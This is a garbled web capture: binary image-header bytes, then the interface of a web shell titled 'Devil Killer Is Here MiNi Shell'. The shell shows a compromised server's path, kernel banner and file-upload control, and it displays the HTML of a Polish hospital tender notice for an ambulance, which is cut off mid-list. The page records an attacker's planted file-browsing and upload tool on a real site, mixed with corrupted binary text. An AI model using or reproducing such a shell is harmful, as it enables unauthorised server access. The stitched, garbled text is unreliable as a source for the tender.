JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240411/0028026001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa fabrycznie nowego ambulansu typu B wraz z wyposażeniem do Powiatowego Zespołu Szpitali </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zespół Szpitali w Oleśnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 932966540</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oleśnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pzsolesnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.pzsolesnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa fabrycznie nowego ambulansu typu B wraz z wyposażeniem do Powiatowego Zespołu Szpitali </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bad9edd5-f7cb-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00280260</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00572029/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa karetki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pzsolesnica <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pzsolesnica</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z<br/>„OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w <br/>sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie <br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i <br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów <br/>teleinformatycznych”.<br/>Poniżej przedstawiamy listę sugerowanych zapisów do specyfikacji:<br/>1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze <br/>szczególnym wskazaniem na .pdf<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie <br/>jednego z formatów:<br/>a) .zip <br/>b) .7Z<br/>3) Wśród formatów powszechnie stosowanych, które nie zostały jednak wskazane<br/>w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone <br/>w takich plikach zostaną uznane za złożone nieskutecznie.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/pzsolesnica</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Powiatowy Zespół Szpitali <br/>ul. Armii Krajowej 1, 56-400 Oleśnica wpisany do Rejestru Podmiotów Wykonujących <br/>Działalność Leczniczą Wojewody Dolnośląskiego pod numerem 000000002093; NIP: <br/>9111847075; REGON: 932966540; KRS 0000186473, tel.+48 71 776 73 08.<br/>2. Dane kontaktowe inspektora ochrony danych: Grażyna Janicka, adres e-mail: <br/>iod@pzsolesnica.pl, Powiatowy Zespół Szpitali, ul. Armii Krajowej 1, 56-400 Oleśnica, tel. <br/>.+48 71 776 73 08.<br/>3. Informacja o celach przetwarzania danych osobowych oraz podstawę prawną <br/>przetwarzania. Celem przetwarzania danych osobowych jest udzielenie zamówienia <br/>publicznego i obsługa wszystkich procedur wynikłych na każdym etapie wykonania <br/>zamówienia, do czasu wygaśnięcia wszystkich roszczeń. Podstawą prawną przetwarzania <br/>jest art. 6 ust. 1 lit b) czyli przetwarzanie jest niezbędne do wykonania umowy, której stroną <br/>jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane <br/>dotyczą, przed zawarciem umowy oraz art. 6 lit f) czyli przetwarzanie jest niezbędne do <br/>celów wynikających z prawnie uzasadnionych interesów realizowanych przez <br/>administratora lub przez stronę trzecią.<br/>4. Informacja o prawnie uzasadnionych interesach realizowanych przez administratora lub <br/>przez stronę trzecią, jeżeli przetwarzanie danych odbywa się na podstawie art. 6 ust. 1 lit. f<br/>RODO. Administrator będzie przetwarzał dane w celu dochodzenia swoich roszczeń w <br/>sądach, wynikających z nienależytego wykonania zobowiązania umownego.<br/>5. Informacja o odbiorcach danych osobowych lub o kategoriach odbiorców, jeżeli istnieją <br/>informacje o zamiarze przekazania danych osobowych do państwa trzeciego lub organizacji <br/>międzynarodowej. Administrator nie będzie przekazywał danych osobowych poza obszar <br/>EOG.<br/>6. Informacje o okresie, przez który dane osobowe będą przetwarzane, administrator <br/>będzie przetwarzał dane przez okres 4 lat od dnia zakończenia postępowania o udzielenie <br/>zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego <br/>przekracza 4 lata, administrator przechowuje protokół postępowania wraz z załącznikami <br/>przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>7. Informacje o prawie osób, których dane są przetwarzane.<br/>a) do żądania dostępu do danych osobowych dotyczących osoby, której dane dotyczą, ich <br/>sprostowania, usunięcia lub ograniczenia przetwarzania,<br/>23<br/>b) do wniesienia sprzeciwu wobec przetwarzania,<br/>c) do przenoszenia danych,<br/>d) do cofnięcia zgody w dowolnym momencie, jeżeli przetwarzanie odbywa się na <br/>podstawie art. 6 ust. 1 lit. a lub art. 9 ust. 2 lit. a RODO, czyli osoba przekazująca dane <br/>wyraziła wyraźną zgodę na przetwarzanie w jednym, lub kilku określonych celach, <br/>e) wniesienia skargi do organu nadzorczego.<br/>8. Informacja, czy podanie danych osobowych jest wymogiem ustawowym lub umownym<br/>Podanie danych jest wymogiem ustawowym zawarcia umowy, osoba, której dane dotyczą, <br/>jest zobowiązana do ich podania, konsekwencją niepodania danych jest odmowa zawarcia <br/>umowy o zamówienie publiczne.<br/>9. Informacja o zautomatyzowanym podejmowaniu decyzji, w tym o profilowaniu. <br/>Administrator nie wydaje decyzji w sposób zautomatyzowany i nie profiluje danych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 14 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z <br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z <br/>04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Powiatowy Zespół Szpitali ul. Armii <br/>Krajowej 1, 56-400 Oleśnica wpisany do Rejestru Podmiotów Wykonujących Działalność <br/>Leczniczą Wojewody Dolnośląskiego pod numerem 000000002093; NIP: 9111847075; <br/>REGON: 932966540; KRS 0000186473, tel.+48 71 776 73 08.<br/>2. Dane kontaktowe inspektora ochrony danych Grażyna Janicka, adres e-mail: <br/>iod@pzsolesnica.pl , Powiatowy Zespół Szpitali, ul. Armii Krajowej 1, 56-400 Oleśnica, <br/>tel. .+48 71 776 73 08.<br/>3. Informacja o celach przetwarzania danych osobowych oraz podstawę prawną <br/>przetwarzania. Celem przetwarzania danych osobowych jest udzielenie zamówienia <br/>publicznego i obsługa wszystkich procedur wynikłych na każdym etapie wykonania <br/>zamówienia, do czasu wygaśnięcia wszystkich roszczeń. Podstawą prawną przetwarzania <br/>jest art. 6 ust. 1 lit b) czyli przetwarzanie jest niezbędne do wykonania umowy, której stroną <br/>jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane <br/>dotyczą, przed zawarciem umowy oraz art. 6 lit f) czyli przetwarzanie jest niezbędne do <br/>celów wynikających z prawnie uzasadnionych interesów realizowanych przez <br/>administratora lub przez stronę trzecią.<br/>4. Informacja o kategorii danych osobowych dane należą do osoby innej, która powierzyła <br/>dane kontrahentowi administratora w toku zamówienia publicznego. Są to dane z kategorii <br/>danych podwykonawców powierzających swoje dane podmiotom składającym ofertę, <br/>ubiegających się o udzielenie zamówienia publicznego. Ten proces pozyskania rzutuje na <br/>zakres przetwarzania, czyli wyłącznie w wyniku zawartej umowy i wyłącznie w jej <br/>przedmiotowym zakresie w granicy kompetencji podwykonawczych osoby powierzającej <br/>własne dane.<br/>5. Informacje o okresie, przez który dane osobowe będą przetwarzane, administrator <br/>będzie przetwarzał dane przez okres 4 lat od dnia zakończenia postępowania o udzielenie <br/>zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego <br/>przekracza 4 lata, administrator przechowuje protokół postępowania wraz z załącznikami <br/>przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>24<br/>6. Informacja o odbiorcach danych osobowych lub o kategoriach odbiorców, jeżeli istnieją <br/>informacje o zamiarze przekazania danych osobowych do państwa trzeciego lub organizacji <br/>międzynarodowej. Administrator nie będzie przekazywał danych osobowych poza obszar <br/>EOG.<br/>7. Informacje o prawie osób, których dane są przetwarzane.<br/>a) do żądania dostępu do danych osobowych dotyczących osoby, której dane dotyczą, ich <br/>sprostowania, usunięcia lub ograniczenia przetwarzania,<br/>b) do wniesienia sprzeciwu wobec przetwarzania,<br/>c) do przenoszenia danych,<br/>d) do cofnięcia zgody w dowolnym momencie, jeżeli przetwarzanie odbywa się na <br/>podstawie art. 6 ust. 1 lit. a lub art. 9 ust. 2 lit. a RODO, czyli osoba przekazująca dane <br/>wyraziła wyraźną zgodę na przetwarzanie w jednym, lub kilku określonych celach, <br/>e) wniesienia skargi do organu nadzorczego,<br/>f) uzyskania informacji o źródle pozyskania danych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZS/TP/11/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa fabrycznie nowego ambulansu typu B wraz z wyposażeniem do Powiatowego Zespołu Szpitali </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114121-3 - Karetki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33100000-1 - Urządzenia medyczne</p> <p class="mb-0">34000000-7 - Sprzęt transportowy i produkty pomocnicze dla transportu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji samochodu bazowego/zabudowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji sprzętu medycznego.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, zgodnie z definicją Wykonawcy <br/>ujętą w art. 7 ust.30 PZP którzy spełniają następujące warunki udziału w postępowaniu:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Wykonawca posiada zdolność do występowania w obrocie gospodarczym, czyli jest <br/>przedsiębiorcą prowadzącym działalność gospodarczą wpisaną w odpowiednim <br/>rejestrze podmiotów gospodarczych.<br/>2) uprawnień do prowadzenia działalności gospodarczej lub zawodowej, o ile wynika to <br/>z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada:<br/>dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności <br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia <br/>na sumę gwarancyjną nie niższą niż 600.000 zł <br/>4) zdolności technicznej lub zawodowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada:<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania <br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał <br/>należycie co najmniej 1 (jedno) świadczenie polegające na dostawie ambulansów z <br/>wyposażeniem medycznym, w dowolnej formie zakupu, o wartości co najmniej <br/>600.000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Na etapie składania ofert zamawiający nie przewiduje przedkładania podmiotowych <br/>środków dowodowych poza Oświadczeniem sporządzonym w trybie Art. 125 ust. 1 <br/>PZP.<br/>a- oświadczenie o spełnieniu warunków udziału w postepowaniu oraz oświadczenie <br/>o braku podstaw do wykluczenia z postępowania na podstawie art.125 ust.1 Pzp. <br/>oraz art.7 ust.1 ustawy o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego (zgodnie z załącznikiem nr 2 do SWZ i nr 2a do <br/>SWZ )<br/>2) Po złożeniu ofert, zamawiający wzywa wykonawcę, którego oferta została najwyżej <br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia <br/>wezwania, podmiotowych środków dowodowych, lub oświadczenia o ich aktualności, <br/>jeżeli je posiada i jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu, lub <br/>dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków <br/>dowodowych.<br/>3) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o <br/>udzielenie zamówienia, zamawiający może na każdym etapie postępowania, w tym na <br/>etapie składania ofert, lub niezwłocznie po ich złożeniu, wezwać wykonawców do <br/>złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli <br/>wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, <br/>aktualnych na dzień ich złożenia.<br/>20<br/>4) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe <br/>środki dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać <br/>wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych <br/>środków dowodowych, aktualnych na dzień ich złożenia.<br/>5) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli <br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w <br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o <br/>informatyzacji działalności podmiotów realizujących zadania publiczne, o ile <br/>wykonawca wskazał w oświadczeniu, że:<br/>a) posiadają zarejestrowaną działalność gospodarczą,<br/>b) posiadają niezbędną wiedzę i doświadczenie, <br/>c) posiadają zaplecze techniczne.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Na etapie składania ofert zamawiający nie przewiduje przedkładania podmiotowych <br/>środków dowodowych poza Oświadczeniem sporządzonym w trybie Art. 125 ust. 1 <br/>PZP.<br/>a- oświadczenie o spełnieniu warunków udziału w postepowaniu oraz oświadczenie <br/>o braku podstaw do wykluczenia z postępowania na podstawie art.125 ust.1 Pzp. <br/>oraz art.7 ust.1 ustawy o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego (zgodnie z załącznikiem nr 2 do SWZ i nr 2a do <br/>SWZ )<br/>2) Po złożeniu ofert, zamawiający wzywa wykonawcę, którego oferta została najwyżej <br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia <br/>wezwania, podmiotowych środków dowodowych, lub oświadczenia o ich aktualności, <br/>jeżeli je posiada i jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu, lub <br/>dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków <br/>dowodowych.<br/>3) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o <br/>udzielenie zamówienia, zamawiający może na każdym etapie postępowania, w tym na <br/>etapie składania ofert, lub niezwłocznie po ich złożeniu, wezwać wykonawców do <br/>złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli <br/>wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, <br/>aktualnych na dzień ich złożenia.<br/>20<br/>4) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe <br/>środki dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać <br/>wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych 